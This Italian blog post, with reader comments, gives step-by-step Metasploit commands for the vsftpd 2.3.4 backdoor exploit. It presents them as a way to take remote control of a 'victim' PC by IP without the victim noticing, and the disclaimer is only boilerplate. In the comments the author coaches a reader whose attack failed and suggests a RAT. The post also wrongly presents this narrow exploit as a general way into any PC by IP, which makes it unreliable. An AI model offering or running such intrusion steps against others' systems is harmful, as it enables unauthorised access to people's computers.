Entrare in un altro PC conoscendo l’indirizzo IP

Abbiamo analizzato vari metodi per sviluppare o creare backdoor e oggi andremo ad approfondire su come entrare in un altro PC conoscendo l’indirizzo IP. Infatti, come abbiamo avuto modo di vedere già altre volte, l’attaccante per portare a termine l’apertura di una backdoor o il compimento di qualsiasi altro tipo di attacco, quasi sempre si avvale dell’IP del target; infatti l’indirizzo IP (oppure chiamato ipv4) serve a identificarci all’interno di una rete e per questo racchiude in se una serie di importantissime informazioni sul nostro dispositivo e sulla nostra connessione. Può essere utile a rintracciarci e a volte entrare nei nostri PC e telefoni per capire chi siamo, cosa facciamo e ottenere altri svariati dati e informazioni. Mediante una serie di passaggi, vi illustrerò uno dei tantissimi modi per riuscire a trovare una falla di sicurezza all’interno di un PC e riuscire a evadere i sistemi di protezione per controllarlo da remoto, senza che la vittima se ne accorga; ovviamente ricordo sempre che se volete testare ciò, dovete farlo esclusivamente sui vostri dispositivi e non danneggiare quelli altrui. Partiamo! Come primo passaggio apriamo un terminale e digitiamo il comando “service postgresql start”

Entrare in un altro PC conoscendo l'indirizzo IP

 

 

 

 

 

 

Dopo aver digitato questo comando potremo procedere con gli altri procedimenti; innanzitutto avviamo la console Metasploit Framework:

-msfconsole

 

Entrare in un altro PC conoscendo l'indirizzo IP

 

 

 

 

 

 

-use exploit/unix/ftp/vsftpd_234_backdoor

Entrare in un altro PC conoscendo l'indirizzo IP

 

 

 

 

 

 

-set RHOST “IP vittima”

Entrare in un altro PC conoscendo l'indirizzo IP

 

 

 

 

 

 

 

-set PAYLOAD cmd/unix/interact

Entrare in un altro PC conoscendo l'indirizzo IP

 

 

 

 

 

 

-exploit

Entrare in un altro PC conoscendo l'indirizzo IP

 

 

 

 

 

 

-A questo punto metasploit dovrebbe riuscire ad aprire una sessione con il computer di cui avete inserito l’indirizzo IP; potete come sempre venire a conoscenza dei comandi mediante il comando help, che elencherà tutte le azioni che potete eseguire da remoto sul PC target.

Ricordo che questo articolo è stato creato solamente a scopo informativo e per lo studio delle vulnerabilità informatiche. Non è da intendersi come un incitazione a compiere azioni di danneggiamento verso sistemi informatici non propri. Avvisiamo inoltre che viene sanzionato chi, senza essere autorizzato, intercetta, impedisce, interrompe o rivela comunicazioni informatiche, (art. 617 quater c.p.); installa apparecchiature dirette ad intercettare, interrompere o impedire comunicazioni informatiche (art. 617 quinquies c.p.); falsifica, altera, sopprime o falsifica la comunicazione informatica acquisita mediante l’intercettazione (art. 617 sexies c.p.); distrugge, deteriora, cancella dati, informazioni o programmi informatici (art. 635 bis c.p.).

6 commenti
  1. Maxi
    Maxi dice:

    dopo che ho fatto EXPLOIT mi vieni questo : “ip” -Exploit failed [unreachable] : Rex:: ConnectionRefused The connection was refused by the remote host (ip).
    Exploit completed, but no session was created. Mi puoi aiutare

    Rispondi
    • Alessandro Di Sano
      Alessandro Di Sano dice:

      Ciao! La situazione da te descritta si verifica quando l’exploit, seppur eseguito correttamente, non è riuscito a varcare i sistemi di sicurezza installati sul dispositivo che stai attaccando. Succede anche a me, questa disciplina richiede pazienza e tanti tentativi, vedrai che se sarai fortunato riuscirai a trovare un altro metodo adatto al tuo hacking. Ti saluto e spero di esserti stato d’aiuto!
      Alessandro, redazione Tecnogalaxy.

      Rispondi
      • Maxi
        Maxi dice:

        Grazie per la tua risposta, per “vedrai che se sarai fortunato riuscirai a trovare un altro metodo adatto al tuo hacking.” Intendi un altro metodo per entrare in un pc tramite ip o un’altro metodo per entrare in un pc.(per esempio tramite un rat)

        Rispondi
        • Alessandro Di Sano
          Alessandro Di Sano dice:

          Dipende da te, puoi usare entrambi i metodi; poi vedrai quale dei due sarà più efficiente. Di solito il più utilizzato è quello tramite IP, ma non sempre riesce ad entrare nel sistema; in questo caso potrai valutare se utilizzare un rat.
          Alessandro, redazione Tecnogalaxy

          Rispondi

Lascia un Commento

Vuoi partecipare alla discussione?
Fornisci il tuo contributo!

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *